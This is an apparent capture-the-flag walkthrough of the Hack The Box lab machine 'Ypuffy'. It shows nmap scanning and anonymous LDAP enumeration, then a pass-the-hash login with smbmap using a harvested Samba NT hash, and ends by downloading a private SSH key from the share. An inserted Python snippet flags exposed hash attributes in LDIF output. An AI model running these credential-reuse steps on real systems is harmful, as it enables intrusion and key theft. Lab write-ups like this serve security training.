@jeremypruitt
Last active June 5, 2019 21:10
Hack The Box - Ypuffy

Techniques

Tools

  • nmap

Setup

  1. Add ypuffy.htb to the hosts file so we can refer to the host by name
    $ echo "10.10.10.107 ypuffy.htb" >> /etc/hosts

Port Scan

  1. Scan for ports and services
    # Use nmap to find available TCP ports quickly
    $ ypuffy_tcp_ports=$( \
        nmap ypuffy.htb \
             -p- \
             --min-rate=1000 \
             -T4 \
        | grep '^[0-9]' \
        | cut -d '/' -f 1 \
        | tr '\n' ',' \
        | sed 's/,$//' \
      )
    
    # Scan found ports for services
    $ nmap ypuffy.htb \
           -p ${ypuffy_tcp_ports} \
           -sV \
           -sC \
           -T4 \
           -oA nmap-tcp-foundports

Enumerate LDAP

  1. Use nmap NSE script to determine basic LDAP info
    $ nmap ypuffy.htb \
           --port 389 \
           --script ldap-rootdse \
           -Pn
    ...
    PORT    STATE SERVICE
    389/tcp open  ldap
    | ldap-rootdse: 
    | LDAP Results
    |   <ROOT>
    |       supportedLDAPVersion: 3
    |       namingContexts: dc=hackthebox,dc=htb
    |       supportedExtension: 1.3.6.1.4.1.1466.20037
    |_      subschemaSubentry: cn=schema
    ...
  2. Now use nmap to do a full LDAP search
    $ nmap ypuffy.htb \
           --port 389 \
           --script ldap-search \
           -Pn
  3. You can also use ldapsearch to perform the same LDAP search as the nmap ldap-search NSE script
    $ ldapsearch -h ypuffy.htb \
                 -x \
                 -s sub \
                 -b "dc=hackthebox,dc=htb"
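A defender-side check that follows from this enumeration, added here as an example and not part of the gist: parse the LDIF that an anonymous ldapsearch returns and flag every entry that exposes a password-hash attribute. The sample LDIF and the attribute list are constructed/assumed for illustration, not Ypuffy's real directory data.

```python
import re

# Attributes (lower-cased) that must never be readable over an anonymous
# bind. Assumption: Samba LDAP schema plus the standard userPassword.
SENSITIVE_ATTRS = {"sambantpassword", "sambalmpassword", "userpassword"}

# Constructed sample in the shape ldapsearch prints; not real Ypuffy data.
SAMPLE_LDIF = """\
# extended LDIF
dn: uid=alice1978,ou=people,dc=hackthebox,dc=htb
objectClass: sambaSamAccount
uid: alice1978
sambaNTPassword: 0123456789ABCDEF0123456789ABCDEF

dn: uid=bob8791,ou=people,dc=hackthebox,dc=htb
objectClass: posixAccount
uid: bob8791

search: 2
result: 0 Success
"""

def parse_ldif(text):
    """Minimal LDIF parser: unfolds continuation lines, skips comments,
    splits on blank lines, drops dn-less blocks (the search/result tail)."""
    entries, current = [], {}
    for line in re.sub(r"\n ", "", text).splitlines() + [""]:
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
        elif not line.startswith("#"):
            key, sep, value = line.partition(":")
            if sep:  # '::' marks base64; marker stripped, value kept as-is
                current.setdefault(key.strip().lower(), []).append(value.lstrip(": "))
    return entries

def find_exposed_hashes(ldif_text):
    """Return (dn, attribute, looks_like_nt_hash) for each sensitive attribute."""
    findings = []
    for entry in parse_ldif(ldif_text):
        for attr in sorted(SENSITIVE_ATTRS & set(entry)):
            for value in entry[attr]:
                is_hash = re.fullmatch(r"[0-9A-Fa-f]{32}", value) is not None
                findings.append((entry["dn"][0], attr, is_hash))
    return findings

if __name__ == "__main__":
    for dn, attr, is_hash in find_exposed_hashes(SAMPLE_LDIF):
        print(f"EXPOSED {attr} on {dn} (32-hex NT hash: {is_hash})")
```

Run it against the real output by piping ldapsearch into a file and passing its contents to find_exposed_hashes; any finding means the directory's ACLs allow anonymous reads of credential material and should be tightened.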

Enumerate SMB

We found a sambaNT password hash in the LDAP search output above. Let's see if it gets us anywhere with SMB.

  1. Use smbmap and the sambaNT hash we found to enumerate SMB with alice1978 creds
    # Notice how the hash is pasted twice into the password field, with a colon separator.
    $ smbmap -H ypuffy.htb \
             -u alice1978 \
             -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B'
    [+] Finding open SMB ports....
    [+] Hash detected, using pass-the-hash to authentiate
    [+] User session establishd on ypuffy.htb...
    [+] IP: ypuffy.htb:445	Name: ypuffy.htb                                        
        Disk                               Permissions
        ----                               -----------
        alice                              READ, WRITE
        IPC$                               NO ACCESS
  2. Add the -R flag to recursively list the contents of directories in the share(s) to which alice1978 has access
    $ smbmap -H ypuffy.htb \
             -u alice1978 \
             -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
             -R
    [+] Finding open SMB ports....
    [+] Hash detected, using pass-the-hash to authentiate
    [+] User session establishd on ypuffy.htb...
    [+] IP: ypuffy.htb:445	Name: ypuffy.htb                                        
        Disk                                        Permissions
        ----                                        -----------
        alice                                       READ, WRITE
        .\
        dr--r--r--     0 Wed Jun  5 14:07:31 2019	.
        dr--r--r--     0 Tue Jul 31 20:16:50 2018	..
        -r--r--r--  1460 Mon Jul 16 18:38:51 2018	my_private_key.ppk
        IPC$                                        NO ACCESS
  3. Let's download that private key file using the --download option of smbmap
    $ smbmap -H ypuffy.htb \
             -u alice1978 \
             -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
             --download alice/my_private_key.ppk
    [+] Finding open SMB ports....
    [+] Hash detected, using pass-the-hash to authentiate
    [+] User session establishd on ypuffy.htb...
    [+] Starting download: alice\my_private_key.ppk (1460 bytes)
    [+] File output to: /lsec/HtB/Machines/Ypuffy/ypuffy.htb-alice_my_private_key.ppk